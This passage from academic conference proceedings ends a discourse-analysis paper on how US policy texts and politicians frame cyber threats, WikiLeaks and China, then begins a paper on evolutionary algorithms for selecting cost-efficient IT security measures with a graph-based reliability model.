Bendrath (2004) remarks that, unlike in the case of nuclear war during the Cold War, an average citizen cannot possibly know whether cyber war is reality or not. Securing Cyberspace for the 44th Presidency states that "In cyberspace, the war has begun", and that "It is a battle we are losing". The fact is that citizens cannot tell whether attacks and hacking are reality, or whether the alleged parties are really responsible for them (ibid.).
2.1 "Federal government bears primary responsibility"
Cybersecurity can no longer be relegated to information technology offices and chief information officers. Nor is it primarily a problem for homeland security and counterterrorism. And it is completely inadequate to defer national security to the private sector and the market. This is a strategic issue on par with weapons of mass destruction and global jihad, where the federal government bears primary responsibility. (Securing Cyberspace for the 44th Presidency)
The Cybersecurity Act of 2009 proposes public and private IT-sector cooperation and government control of private sector networks. The first draft of the Act also proposed the so-called "kill-switch", which would have given the president unilateral authority to control (or shut down) access to the internet without explanation. This created public debate. The provision was revised, and a year later the Act was approved and passed to the Senate for consideration. However, the president would still be authorized to "declare cyber emergency" and decide on its duration. The bill was proposed in a congress session, but did not become law.
The message is clear. The internet should be controlled, and its control is government responsibility. In 2010, this discussion was more heated than ever, after WikiLeaks published government documents. Politicians were quick to label Julian Assange a terrorist (James, 2010), and the Pentagon banned military access to WikiLeaks (Scarborough, 2010) while the federal authorities were investigating whether Assange could be charged under the Espionage Act. "This is worse even than a physical attack on Americans, it's worse than a military attack," says congressman Peter King, again repeating the rhetoric of information as a physical weapon (James, 2010). This rhetoric is the paradox of cyber discourse.
2.2 "Thousands of people die"
When discussing cybersecurity, the problem and question is the definition of cyber warfare. When can a cyber operation be referred to as cyber war, and what is the difference between cyber terrorism and cyber sabotage? There may not be any difference between the terms, but it is a matter of word choice (Kuparinen, 2009). The use of the word 'terrorism' is a rhetorical choice.
In the Merriam-Webster online dictionary terrorism is defined as
1. The calculated use of violence (or the threat of violence) against civilians in order to attain goals that are political or religious or ideological in nature; this is done through intimidation or coercion or instilling fear
2. The act of terrorizing, or state of being terrorized; a mode of government by terror or intimidation.
3. The practise of coercing governments to accede to political demands by committing violence on civilian targets; any similar use of violence to achieve goals.
The discussion on the 2007 cyber attacks against Estonian targets is an example of the confusion of the terms 'terrorism' and 'sabotage'. Are attacks against online services a "calculated use of violence"? This is a question James Lewis (CSIS) asks:

Terrorism requires violence and horror. On September 11th, for example, after a day of shocking images, riders of Washington's subway system could still smell smoke in the tunnels from the burning Pentagon. In Estonia's recent cyber incident, people were unable to access their bank accounts online.

Lewis continues by stating that exaggeration about epic disasters is a way to bring cyber threats into the public consciousness. However, this did not stop The Telegraph from using the headline "Cyberterrorism is real - ask Estonia" (30.3.2007). If the attacks against Estonian infrastructure are considered cyber terrorism, the definition of terrorism is either different in the context of cyber, or needs to be redefined. In order to be properly established, the term needs a clear semantic representation despite its political nature. The political demand for threat discourse will be discussed in the following chapter.
3. Threat discourse: Methods for analysis

As the previous chapters have demonstrated, cyber rhetoric is synonymous with threat discourse. This brings us into the domain of security analysis. This chapter focuses on bringing together two approaches, securitization theory and functional language theory, which form the backbone of the analysis of threat discourse. The following sections will briefly discuss the relevance of securitization theory in discourse analysis, and bring it together with functional language theory.
3.1 Securitization as discourse

From the perspective of discourse analysis, securitization theory (Buzan, Waever & de Wilde, 1998) has three key concepts: the securitizing actor, the securitizing move, and the referent object. "A securitizing actor is someone, a group, who performs the security speech act" (Ibid: 40). The securitizing move is a "discourse that takes the form of presenting something as an existential threat" (Ibid: 25), and the referent object is the object that is existentially threatened and, at the same time, has "a legitimate claim to survival" (Ibid: 36). The threats are verbalized through speech acts: threat discourse.

These three elements are the pivotal structures of security discourse, which, ironically, is typically realized as threat discourse. The result of successful securitizing moves is securitization, which removes the referent object from the domain of politics and transfers it into "panic politics". This polarizes the concepts of politicization and securitization (Ibid: 29). If the process of securitization is not successful, the act should be understood as a securitizing move (Ibid). All this actualizes through language and discourse. The structural properties of argumentation support the semantics of the debate.
3.2 What does functional language theory have to offer?

According to functional language theory, language has three functions. They are presented below as in Butt (2003):
Ideational (experiential and logical metafunctions)
Interpersonal
Textual
In this study the ideational function is the foundation of the analysis, as it deals with the conceptualizing process of language by focusing on the natural world and events, including human consciousness and language. This function contains the experiential and logical metafunctions. The logical metafunction uses our experiences to organize reasoning. The experiential metafunction is realized by the transitivity system, and it deals with our experience and understanding of the world: "It conveys a picture of reality", and this makes it the main tool of this analysis. The experiential function answers the question of who does what to whom under what circumstances, the Process being the core element of the question.

According to Halliday (2004: 170-172), a clause is not only a flow of action, but a mode of reflection that imposes endless variation as well as flow of events by a system of transitivity. A clause typically consists of the following components (Halliday, 2004: 175):
Process
Participants (involved in the Process)
Circumstance (associated with the Process)

As demonstrated above, all elements of the clause are tied to the Process. The transitivity system contains the idea that 1) a clause is a process in which 2) some things/events function as participants, who, simply put, either do/act/happen, or are targets of doing/acting/happening. The system construes experience into process types: material, behavioral, mental, verbal, relational and existential. These process types are realized by verbal groups. Nominal groups represent participants, and adverbial groups circumstance.
Table 1: Examples of clause elements
MATERIAL: Participant: They | Process: attacked | Target: us | Circumstance: viciously.
RELATIONAL: Participant: They | Process: are | Attribute: wonderful men and women
This discussion on the role of processes (verbs) and their significance functions as an argument for the method of analysis. The choice of process type in discourse is used to create representations of events, objects and phenomena around us. In addition, the presence or absence of clause elements is perception management of sorts. We can describe things to be done or simply to happen, without any reference to the doer or the object of action. This is exactly what the transitivity system

Lukin (2005) demonstrates the function of the transitivity system in military discourse. She discusses the aspect of "doing without doing to" in war rhetoric, a tactic of "muting" action.
Table 2: Examples of actor+process configurations, from Lukin, 2005: 7
Actor | Process (circumstantial processes)
The operation | began on the 19th of March
Our forces | are operating throughout Iraq
Decisive precision shock | began last night
In the above examples the omission of the target of action functions as a tool for perception management. Leaving out clause elements, in this case the object/target of military action, creates a narrative of 'happenings' rather than actions: "The attacks occurred with effectiveness" but not "We attacked effectively". The manipulation of clause elements could be called 'grammatical tactics' in threat discourse.

Sometimes Processes turn into Participants. This process is called nominalization. In functional grammar, nominalizations can be understood as metaphors (Butt, 2003: 74). Through nominalization, an action turns into a concept. The opening clause of the Cybersecurity Act of 2009 is a good example:

Nominalization: America's failure to protect cyberspace is one of the most urgent national security problems facing the country.
The nominalization can be compared to a clause with a Participant + Process configuration:

Process description: America has failed to protect cyberspace.

When a Process turns into a Participant, the "event has become an object and the language is no longer congruent with our experience" (Butt, 2003: 75).

The upcoming analysis will further analyze the evaluative patterns of the data. The action descriptions can be categorized according to their evaluative function. Martin & White (2005) argue there are three semantic categories for expressing attitude. These express positive or negative ways of feeling (Affect), our attitudes towards people and how they behave (Judgement), and our evaluations of the worth of things and phenomena around us (Appreciation):
Table 3: Types of attitude
Attitude | Affect | Judgement | Appreciation
Variables | un/happiness, in/security, dis/satisfaction | Social esteem: normality, capacity, tenacity; Social sanction: veracity, propriety | reaction, composition, valuation
Behavior | wail, trust, condemn | perform, fail, depend (social esteem); deceive, abide (social sanction) | bore, help
Whereas the securitization theory discussed in the previous section does not provide tools for the structural analysis of the securitizing move, functional language theory offers a method for determining the representation of 'self' or 'the other' in discourse. This is the key to analyzing threat discourse. The following chapter is dedicated to two analyses: the first deals with the properties of the securitization narrative, and the second discusses the linguistic patterns and semantic dimension of cyber discourse.

4. Analysis: Cyber, censorship and securitization

This chapter focuses on two aspects of language and discourse. First, a brief analysis of the WikiLeaks discussion will discuss the narrative patterns of cyber/information security. This will act as an introduction to threat/cyber discourse and provide examples of securitizing moves. After that, the structural and evaluative properties of threat discourse are approached through the analysis of cyber discourse.
4.1 Threat discourse as a narrative: WikiLeaks in the media

WikiLeaks gained wide international publicity when it published video material leaked by someone in the U.S. military. These videos were recorded during helicopter operations in Iraq. The one that caused most controversy, published by WikiLeaks under the name Collateral Murder, shows the shooting of a group of men, who later turned out to be journalists and photographers, and later of civilians who stopped to help the wounded and killed. The disproportionate use of force (among other munitions, Hellfire missiles were employed) and the arrogant and mocking comments of the crew caused public outrage. The comments "Come on, let us shoot!" and "Oh yeah, look at those dead bastards" can be heard on the video.

WikiLeaks kept publishing controversial material, and in November 2010 it released a massive number of diplomatic cables. WikiLeaks founder Julian Assange gave a number of selected journalists access to the material. He said that the massive amount of information was too much for them to research, so journalists, as professionals, would be the right people to research the material, remove any details that would endanger, for example, civilian collaborators, and report their analysis in the media (Wikirebels, 2010).
The publishing immediately enraged a number of politicians in the U.S. and elsewhere. Assange's actions were not only quickly condemned, but referred to as acts of 'terror'. Secretary of State Hillary Rodham Clinton stated that the actions of WikiLeaks "tear at the fabric" of responsible government, and are an attack not only on America, but on the international community. Tom Flanagan, a Canadian former presidential advisor, suggested President Obama should have Assange assassinated (Collins, 2010). Sarah Palin demanded WikiLeaks should be hunted like al-Qaeda (Beckford, 2010). Politicians were quick to compare WikiLeaks to terrorists: Congressman Peter King wrote to Clinton that "WikiLeaks engaged in terrorist activity by committing acts that it knew, or reasonably should have known, would afford material support for the commission of terrorist activity" (Pillifant, 2010).

Clinton has emphasized the roles of free information and transparency. In her speech on internet freedom she cites President Obama (Council on Foreign Relations, 2010):

During his visit to China in November, President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today.

A year later, after the publishing of the diplomatic cables, Clinton's rhetoric had thus changed, but the WikiLeaks website declared that its mission is transparency (Schmitt, 2010):

All governments can benefit from increased scrutiny by the world community, as well as their own people. We believe this scrutiny requires information.

Whatever the truth behind the leaked documents, from the perspective of securitization it is the logic of argumentation that interests us. The status of freedom of speech as an intrinsic value and as the foundation of Western culture suffered a blow. WikiLeaks, embodied by Julian Assange, was accused of threatening national security. The initial leaker and the newspapers that published leaked material have a minor role in the threat discourse. The press enjoys freedom of the press, but the internet as a medium clearly does not enjoy the same freedom. Information is referred to as a "bomb" (Wikirebels, 2010) when it is online.

Obviously it is not the information that is the problem. According to Secretary of Defense Gates, the publication of the cables was merely embarrassing (U.S. Department of Defense, 2010). It is the fact that this information is published online that is seen as a threat.
4.2 Structures and evaluations of threat discourse: China and cyberspace

In this section, threat discourse is approached through Process analysis, meaning descriptions of action and being. The data comes from a number of American white papers on cyber security: The Cybersecurity Act of 2009, Securing Cyberspace for the 44th Presidency, and the 2008 Report to Congress by the China Economic and Security Review Commission.

In American cyber discourse the threat types can be divided into three categories. The most prominent of them is military threat. This is verbalized with enemy action descriptions as follows:

Operate through foreign nations' military or intelligence-gathering operations

Physical threat is the other main threat type. This category contains descriptions of enemy action such as attacking/influencing/manipulating critical infrastructure and networks that may affect people's lives and well-being:

Disrupt telecommunications, electrical power, energy pipelines, refineries, financial networks, and other critical infrastructures

The third main category of threat descriptions deals with the status of the U.S. as a financial superpower:

Have easy access to military technology, intellectual property of leading companies, and government data

By categorizing the Process types of enemy action descriptions, it is easy to see the narrative. According to the reports, Chinese hackers are described as a threat to the critical infrastructure (which culminates in the citizens in their own homes), to corporations through industrial espionage, and to the entire nation through the looming, full-scale cyber war.

The following sections will discuss the categorization of data into Process types, as well as their evaluation types.
4.2.1 Enemy capacity

Descriptions of enemy capacity are the core of the data. They are high-modality threat descriptions. The following data are examples of how China's actions are described:
Table 4: Descriptions of capacity
Action description | Process type | Evaluation
gain access and view protected data or cause infrastructure components to operate in an irregular manner | material, material | Judgment: social esteem: capacity (negative evaluation)
continue to develop and field disruptive military technologies | material | Judgment: social esteem: capacity (negative evaluation)
have implications beyond the Asia-Pacific region | relational possessive | Judgment: social esteem: capacity (negative evaluation)
can engage in forms of cyber warfare so sophisticated | material (relational possessive) | Judgment: social esteem: capacity (negative evaluation)
can access the NIPRNet | material | Judgment: social esteem: capacity (negative evaluation)
A typical action description is a material process, which aims to highlight the adversary's capability, resources and training to wage war in cyberspace. Obviously, these are also attributes that are desirable for every nation's military. Although there are a number of descriptions that contain moral evaluation, the context of war normalizes them to capacity descriptions. The descriptions are evaluated as 'negative capacity':
Table 5: Capacity vs. propriety
Action description | Process type | Evaluation
have been able to penetrate poorly protected U.S. computer networks | material | Judgment: social esteem: capacity (negative evaluation)
Penetrating U.S. networks could be evaluated, depending on the context, as criminal or immoral, but the description contains the clear message that the enemy is resourceful and skilled, and ready to use their skills if it is militarily necessary.

4.2.2 Enemy affect

The enemy is not described with the mental process type much, but rhetorically the use of this Process type is significant.
Table 6: Mental processes
Action description | Process type | Evaluation
believe the United States already is carrying out offensive cyber espionage and exploitation against China | mental | Affect: insecurity
believe that in many cases a vulnerable U.S. system could be unplugged in anticipation of a cyber attack | mental | Affect: security
believe the United States is dependent on information technology | mental | Affect: security
believe there is a first mover advantage in both conventional and cyber operations against the United States | mental | Judgment: social esteem: capacity
Interpreting the beliefs or thinking of someone else is always a rhetorical tool. Here the context emphasizes this fact. First, it is stated that China considers cyber war as defence. Then, it is stated that China already believes the U.S. "already is carrying out offensive cyber espionage". In other words, China believes cyber attacks are necessary right this moment. This argument contains the only action description that signals insecurity on China's part. The outcome is threat discourse: China feels threatened and may attack at any moment.

4.2.3 Propriety

Evaluating the propriety of the adversary may be the oldest tradition of war rhetoric and information warfare. The data of this study is exceptional in the sense that the propriety of the adversary is aggressively demonized. Instead of describing the adversary as brutal monsters, the enemy identity is compiled of descriptions of treacherous, skilled strangers, who act against the U.S. and affect the everyday lives of its citizens. Sometimes making a distinction between the descriptions of capacity and propriety is difficult, as what is capacity for the enemy may appear (and is often argued) as something immoral and cheap to 'us'.
Table 7: Propriety
Action description | Process type | Evaluation
disrupt telecommunications, electrical power, energy pipelines, refineries, financial networks, and other critical infrastructures | material | Judgment: social sanction: propriety (negative evaluation)
have connections to terrorist groups | relational possessive | Judgment: social sanction: propriety (negative evaluation)
are targeting our information systems and infrastructure for exploitation and potential disruption or destruction | material | Judgment: social sanction: propriety (negative evaluation)
have other terrible things they can do to us | relational possessive | Judgment: social sanction: propriety (negative evaluation)
Here, the nature of war distinguishes the two: descriptions of military action are interpreted as descriptions of capacity, and attacks against civilians or civilian infrastructures are interpreted as moral judgment.

4.2.4 Nominal structures

The following examples illustrate how a nominal structure encapsulates the action and creates a 'brand' or a concept. Below, the examples contain nominal structures used to refer to 'us' and 'them':
Table 8: Nominalizations 'us' vs. 'them'
Group | Nominal structure | Evaluation
'US' | the adequacy of existing legal authorities | Judgement: social esteem: capacity
'US' | the incapacity or destruction of such systems and assets | Judgement: social esteem: capacity
'US' | the vulnerability of U.S. infrastructures | Judgement: social esteem: capacity
'US' | Our lack of cyber security | Judgement: social esteem: capacity
'THEM' | China's developments in these areas | Judgement: social esteem: capacity
'THEM' | the natural progression of those wishing to harm U.S. security interests | Judgement: social sanction: propriety
'THEM' | violent extremism in support of a radically different world-view | Judgement: social sanction: propriety
'THEM' | the emergence of powerful new state competitors | Judgement: social esteem: capacity
The nominal structures referring to 'self' express lack of capacity, whereas the adversary is described as threatening due to their capacity. These nominal structures summarize the essence of the data. They are nominalized action descriptions that encapsulate the threat discourse. A quick look at them tells the reader what the discourse focuses on: the development and progression of the adversary, and the vulnerability of the U.S.
5. Conclusion

As stated earlier, cyber discourse is a synonym for threat discourse. As cyber is conceptualized through threat descriptions, it is natural that it, as a domain, is caught in between the military and the civilian world. The militarization of cyber discourse reflects a certain political agenda. When the word "cyber" is uttered, people immediately think of security. In this sense, the securitization has been successful. The debates about China's cyber capability or WikiLeaks are narratives within this threat discourse.

According to the narratives researched in this article, the internet is not seen as a medium among others. Instead, while recognizing its place as a medium for information sharing, it is seen as a battle space. Even if the information was available both online and through the press, only internet censorship is called for.

The security (or threat) discourse about cyberspace stems from its unclear status. Either cyberspace is recognized as a public information environment, or it is militarized into a dual-use weapon, which will primarily function as a regulated medium and essentially as a battle space. The outcome of the power struggle over internet authority will decide.
References

Beckford, M. (2010) 'Sarah Palin: hunt WikiLeaks founder like al-Qaeda and Taliban leaders', The Telegraph, 30 Nov [Online] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/8171269/Sarah-Palin-hunt-WikiLeaks-founder-like-al-Qaeda-and-Taliban-leaders.html [30 Jan 2011]
Bendrath, R. (2003) 'The American Cyber-Angst and the Real World - Any Link?', in Latham, R. (ed.) Bombs and Bandwidth: The emerging relationship between information technology and security, New York: The New Press.
Buzan, B., Waever, O. and De Wilde, J. (1998) Security: A new framework for analysis, London: Lynne Rienner Publishers.
Center for Strategic and International Studies (CSIS) (2008) Securing Cyberspace for the 44th Presidency, Washington, DC.
China Economic and Security Review Commission (2008) 2008 Report to Congress, Washington: U.S. Government Printing Office.
Collins, N. (2010) 'WikiLeaks: guilty parties 'should face death penalty'', The Telegraph, 1 Dec [Online] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/8172916/WikiLeaks-guilty-parties-should-face-death-penalty.html [30 Jan 2011]
Council on Foreign Relations (2010) 'Clinton's Speech on Internet Freedom, January 2010' [Online] Available: http://www.cfr.org/publication/21253/clintons_speech_on_internet_freedom_january_2010.html [30 Jan 2011]
Halliday, M.A.K. (2004) An introduction to functional grammar, 3rd edition, revised by M.I.M. Matthiessen, London: Arnold.
James, F. (2010) 'WikiLeaks Is A Terror Outfit: Rep. Peter King', NPR, 29 Nov [Online] Available: http://www.npr.org/blogs/itsallpolitics/2010/11/29/131664547/wikileaks-is-a-terror-outfit-rep-peter-king
Kuparinen, V-P. (2009) Interview with the director, 25 August 2009. National Emergency Supply Agency, Helsinki: Author.
Lewis, J.A. (2007) 'There's No Such Thing As Cyberterror', Atlantic Community, 25 July [Online] Available: http://www.atlanticcommunity.org/index/Open_Think_Tank_Article/There%27s_No_Such_Thing_As_Cyberterror [30 Jan 2011]
Lukin, A. (2005) 'Information warfare: the grammar of talking war', Social Alternatives, Vol 24 No. 1, First Quarter, pp. 5-10.
Martin, J.R. and White, P.R.R. (2005) The language of evaluation: Appraisal in English, New York: Palgrave Macmillan.
Pillifant, R. (2010) 'Peter King On Why Wikileaks Should Be Declared A Terrorist Organization [Video]', The New York Observer, 29 Nov [Online] Available: http://www.observer.com/2010/politics/peter-king-why-wikileaks-terrorist-organization [30 Jan 2011]
Scarborough, R. (2010) 'Military ordered to stay off WikiLeaks', The Washington Times, 6 Aug [Online] Available: http://www.washingtontimes.com/news/2010/aug/6/pentagon-bars-staff-from-visiting-wikileaks-site/
Schmitt, E. (2010) 'In Disclosing Secret Documents, WikiLeaks Seeks 'Transparency'', The New York Times, 25 July [Online] Available: http://www.nytimes.com/2010/07/26/world/26wiki.html [30 Jan 2011]
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Online] Available: http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf [30 Jan 2011]
US Department of Defense (2010) 'DOD News Briefing with Secretary Gates and Adm. Mullen from the Pentagon'
[Onl<strong>in</strong>e] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]<br />
White House (2009) Cyberspace Policy Review: Assur<strong>in</strong>g a Trusted and Resilient Information and Comunications<br />
Infrastructure. [Onl<strong>in</strong>e] Available: http://www.whitehouse.gov/assets/documents/<br />
Cyberspace_Policy_Review_f<strong>in</strong>al.pdf [30 Jan 2011]<br />
Wikirebels (2010) Documentary, Swedish Television. [Onl<strong>in</strong>e] Available: http://www.viddler.com/<br />
explore/WikiRebels/videos/1/ [30 Jan 2011]<br />
Yould, R. (2003) 'Beyond the American Fortress: Understand<strong>in</strong>g Homeland <strong>Security</strong> <strong>in</strong> the Information Age'. In<br />
Latham, R. (Ed.) Bombs and Bandwidth: The emerg<strong>in</strong>g relationship between <strong>in</strong>formation technology and<br />
security, New York, The New Press.<br />
171
Evolutionary Algorithms for Optimal Selection of Security Measures<br />
Jüri Kivimaa (1) and Toomas Kirt (2)<br />
(1) Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia<br />
(2) University of Tartu, Tallinn, Estonia<br />
Jyri.Kivimaa@mil.ee<br />
Toomas.Kirt@ut.ee<br />
Abstract: A very important issue in IT security or cyber security management is to provide cost-efficient security measures that achieve the needed or required security goals (mainly CIA levels: Confidentiality, Integrity, Availability). To provide an optimal solution, an optimization task with two goals has to be solved: to minimize the needed resources and to maximize the achievable security. The computational complexity of this optimization task is very high. In previous work a matrix-based security model and an optimization framework based on Pareto optimality and the discrete dynamic programming method were used. That solution has a quite important imperfection: it required independence between security activity areas. That is not appropriate for IT security, because it does not follow a quite important principle of IT security: security is like a chain that is only as strong as its weakest link, and it relies on layered security or defence in depth. Evolutionary optimization, as an alternative optimization tool, removed the independence restriction of the matrix-based security model and the dynamic programming method, but its first implementation was slightly slower than the other methods. To improve the performance of the evolutionary optimization we have performed a meta-level optimization of the algorithm's parameters, and as a result its speed is comparable to the other optimization techniques. As the evolutionary optimization is independent for all possible budget levels, it leads to the possibility of using a graph-based security model. The graph-based security model is a new and dynamic framework for security management. This paper presents how the implementation of an evolutionary optimization technique removed the independence restriction on security measures and led to the implementation of an efficient graph-based security model.<br />
Keywords: graded security model, information security metrics, evolutionary optimization<br />
1. Introduction<br />
One of the most important tasks for IT security management is the optimal use of existing resources, and the main idea of our R&D work is to propose to IT security decision-makers a Graded Security Model (GSM) and a decision support system for it. In earlier papers (Kivimaa, 2009; Kivimaa, Ojamaa, and Tyugu, 2009; Ojamaa, Tyugu, and Kivimaa, 2008) it was shown how to use the GSM for finding optimal solutions based on Pareto-optimal situation analysis; the discrete dynamic programming method was used for the optimization calculations and the weighted average confidence of the security activity areas was used as the optimization criterion. As it turned out, the computational complexity of the optimization task is very high. For example, if an IT security model has 30-40 activity areas and each of them has 4 possible implementation levels, then there are 4^30 to 4^40 possible solutions from which to select an optimum. The brute force optimization technique would require a couple of years to calculate even one possible budget point.<br />
In (Kivimaa 2009) some weaknesses caused by the dynamic programming method were also brought up. Namely, when dynamic programming is used for the optimization, the security activity areas must not depend on each other and their levels must be additive. To achieve better solutions in the future it is reasonable to continue GSM development, mainly by collecting expert knowledge for an up-to-date model: up-to-date information about security goals and their levels, the dependency matrix between information security activity areas and their realization levels, and up-to-date realization costs and effectiveness of those levels. And, since treating IT security activities as independent is a source of quite serious problems, to cover IT security problems in more detail and in a correct way we have to accept dependencies between the lines of the Dependencies Matrix; to describe these dependencies, in addition to the Dependencies Matrix we use (find or work out) the Dependencies Graph of IT security or of IT security activity areas.<br />
Because the independence of security activity areas was required by the Dynamic Programming (DP) method, our aim was to apply an alternative optimization method, and we decided to use an evolutionary algorithm, a universal method for complex optimization in many fields. The evolutionary algorithm starts each optimization process from the beginning and therefore has no problems related to independence and additivity.<br />
Jüri Kivimaa and Toomas Kirt<br />
As the evolutionary optimization is independent for all possible or interesting budget levels and intervals, it leads to the possibility of using a graph-based security model. The graph-based security model is a new and dynamic framework for security management. The new graph model gives us the possibility to calculate the most needed/wanted reliability of a specific IT security system (also often called Confidence) and the Security Efficiency (SE), whose value can be expressed as SE = Information Value / Real Losses = 1 / (1 - Confidence).<br />
Our main ideas are:<br />
- Use metrics to determine information systems' security requirements, i.e. use high-level risk analysis (levels of security goals) as IT security metrics;<br />
- Secure IT systems and their information in an economically rational/optimal manner, i.e. according to the data security requirements;<br />
- The important issue in defining and implementing security measures is the economic efficiency of security activities, that is, we want to get the best results for our money: to minimize the costs and to maximize the integral security confidence.<br />
2. Graded security model<br />
The graded security model has been in use for a long time in high-risk areas like nuclear waste depositories, radiation control etc. (DOE 1999, see also Kivimaa 2009 for details). In IT security it is also reasonable to apply a methodology that allows one to select rational security measures based on graded security, taking into account the available resources, instead of using only the hard security constraints prescribed by standards, which usually do not include economic parameters: the cost and efficiency of the implemented security measures.<br />
The ideas of graded security were used in the US Department of Energy security model (DOE 1999) and in its updated NISPOM version (NISPOM 2006).<br />
In the NISPOM model 14 graded security activity areas are defined and 15 to 20 are left only on base levels. As the NISPOM model is meant for the protection of critical information infrastructure, it is obvious that these base levels are the highest possible implementation levels. But for institutions with less critical IT security these NISPOM areas on the base level have different possible implementation levels too, i.e. theoretically they are graded too (see Figure 1).<br />
But the matrix-based model has one quite serious limitation: in a table we have no good possibility to consider dependencies between table columns and rows, that is, there is no good way to describe the really existing additive and dependent nature of IT security goals and activity areas (Kivimaa 2009).<br />
2.1 Graph based security model<br />
It is possible to write dependencies between the matrix rows as functions into cells, but the results are much more understandable and comprehensive (understandable at one glance) if we represent the collection of rules as a graph structure. At the same time we are no longer limited to the weighted average only; with a graph we get the possibility to calculate for decision makers some very interesting and important parameters about the achieved security level: confidence and security efficiency (in more detail, see 2.2).<br />
The graded IT security graph is based on the main ideas of the "(People - Process - Technology) and Organization" Business Model for IT security (ISACA 2009). Based on this and the IT security Dependency Matrix (Figure 1), containing security areas and their levels, a Bank IT security Graph (Figure 2) is formed.<br />
There are two important principles in IT security that are based on the graph and are much more visible and understandable there:<br />
- A chain is only as strong as its weakest link: in some IT security areas we must have a valid reliability level, otherwise the overall reliability of the security system will be 0 (see Figure 2; mainly People, SW, Power, HW, LAN and AntiMalware), the so-called must-be elements in the graph.<br />
- Layered security / defence in depth: we have a lot of security activity areas that are parallel to the so-called must-be areas and make it possible to raise the reliability of these must-be areas (Figure 2).<br />
Figure 1: IT security dependency matrix for a bank<br />
Figure 2: IT security dependency graph for a bank<br />
2.2 Model optimization<br />
We are building a model that binds security measures (grouped by security activity areas) with costs and confidences of achieving the security goals and their levels. We introduce a fitness function that presents by one numeric value the integral confidence of the achieved security level. This allows us to formulate the problem of selecting security measures as an optimization problem in precise terms. However, we still have two goals: to minimize the costs and to maximize the integral security confidence. This problem is solved by building a Pareto optimality trade-off curve that explicitly shows the relation between the used resources and the security confidence (Figure 3).<br />
Knowing the available resources, we can find the best possible security level that can be achieved with them and find the security measures to be taken. From the other side, if the required security level is given, we can find the resources needed and the measures that have to be taken. This requires solving an optimization problem for each value of resources.<br />
Figure 3: Search of optimal security along resource dimension – Pareto optimality trade-off curve<br />
To calculate the Pareto set/curve for the GSM we have used/tested three possible optimization techniques:<br />
- Brute Force<br />
- Dynamic Programming<br />
- Evolutionary Algorithms<br />
All approaches have their pluses and minuses. The first problem area is the calculation time needed for the optimization (in more detail, see 2.2.1).<br />
Although the Dynamic Programming method is a very good way to get rid of calculation time problems (the optimization time on a medium consumer desktop PC is excellent, a minute or two), DP has other quite serious limitations:<br />
- Security activity areas / security measure groups must not depend on each other;<br />
- Their levels / the security measures realizing those levels must be additive;<br />
- It is practically impossible to obtain alternative and very close optimization results.<br />
The evolutionary algorithm has the best capabilities: it has no problems with dependency/independency, additive/non-additive measures or matrix/graph models, it finds all alternative or very close results for all possible and interesting cost levels, and its main advantage is that evolutionary optimization starts the optimization for all possible and/or interesting budget points from the very beginning. The only possible problem is related to calculation time: the parameters of the optimization have to be optimal (in more detail, see 2.2.1 and 3.1).<br />
2.2.1 The computational complexity of the optimization task<br />
For comparing the three optimization methods we will find the calculation times of all three for small and medium non-IT-critical enterprises (~10 security activity areas) and for bigger IT-critical enterprises (for the Bank, ~30 security activity areas):<br />
3. Brute force<br />
We have to calculate and compare q·k^n possible variations (q is the number of possible values of security budget levels, n is the number of security measure groups or security activity areas, k is the number of possible implementation levels per security measure group / security activity area, quite prevalently 3 or 4):<br />
- For 10 security activity areas, testing of 100·4^10 ≈ 100·10^6 variations is required;<br />
- For 30 security activity areas, testing of 100·4^30 ≈ 100·10^18 variations is required.<br />
With more detailed IT security handling (larger n) the optimization time increases exponentially, and if we consider that a medium consumer PC can perform the optimization for 10 security activity areas (for a small, non-IT-critical institution, ~100·10^6 calculations and comparisons) in a minute, then brute force optimization for a bigger IT-critical institution will take hundreds of years.<br />
4. Dynamic programming<br />
We have to calculate and compare q^2·k·n possible variants (q, n and k are defined as for brute force):<br />
- For 10 security activity areas, testing of 100·100·4·10 = 0.4·10^6 variations is required;<br />
- For 30 security activity areas, testing of 100·100·4·30 = 1.2·10^6 variations is required.<br />
With more detailed IT security handling the optimization time increases linearly, and consequently even an order-of-magnitude rise in n does not lead to any calculation time problems.<br />
5. Evolutionary algorithm<br />
The number of variants this algorithm has to calculate/compare is:<br />
q · Population size · Number of Generations · Number of Repeats.<br />
Based on the results of the meta-level optimization (see 3.1.2), 'Population size' = 3n, 'Number of Generations' = 4n and 'Number of Repeats' = 3 (q is the number of possible values of security budget levels, n is the number of security measure groups or security activity areas), so the optimal number of variants to calculate and compare is 36·q·n^2:<br />
- For 10 security activity areas, testing of 36·100·10^2 = 0.36·10^6 variations is required;<br />
- For 30 security activity areas, testing of 36·100·30^2 = 3.24·10^6 variations is required.<br />
With more detailed IT security handling the optimization time increases quadratically, and consequently it is quite important to use optimal parameters in the optimization.<br />
In conclusion:<br />
- Optimization time is critical;<br />
- The Brute Force optimization method is inappropriate for more complex cases;<br />
- The Dynamic Programming based optimization method has no problems related to calculation time;<br />
- For the Evolutionary method it is important to use the optimal optimization parameters.<br />
5.1.1 GS graph-based model reliability/confidence calculations<br />
The main idea of the optimization is to achieve the graph's maximal Confidence with minimal Costs, i.e. the Pareto set or Pareto frontier of GSM Costs vs. Confidence.<br />
5.1.2 Reliability (alias confidence) of series systems of n identical and independent components<br />
A series system is a configuration such that, if any one of the system components fails, the entire system fails. Conceptually, a series system is one that is as weak as its weakest link. A graphical description of a series system is shown in Figure 4.<br />
Figure 4: Representation of a series system of n components<br />
Engineers are trained to work with system reliability [RS] concepts using "blocks" for each system element, each block having its own reliability for a given mission time T:<br />
RS = R1 × R2 × ... × Rn (if the component reliabilities differ), or<br />
RS = [Ri]^n (if all i = 1, ..., n components are identical)<br />
A set of n blocks connected in series can be replaced with a single block with the reliability/confidence RS/CS.<br />
5.1.3 Reliability (alias confidence) of parallel systems<br />
A parallel system is a configuration such that, as long as not all of the system components fail, the entire system works. Conceptually, in a parallel configuration the total system reliability is higher than the reliability of any single system component. A graphical description of a parallel system of n components is shown in Figure 5.<br />
